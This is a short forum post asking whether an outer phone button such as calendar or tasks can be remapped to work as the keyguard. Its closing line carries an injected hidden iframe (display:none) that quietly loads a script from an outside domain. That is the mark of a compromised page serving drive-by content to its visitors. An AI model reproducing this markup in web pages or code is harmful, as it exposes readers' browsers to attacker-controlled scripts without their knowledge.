Is it possible to change the functionality of one of the outer buttons (ie: calendar, tasks, etc) to make it perform the keyguard function?

It's frustrating to have to hit the on-screen button for a keyguard - takes a few seconds to get it right with a finger...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
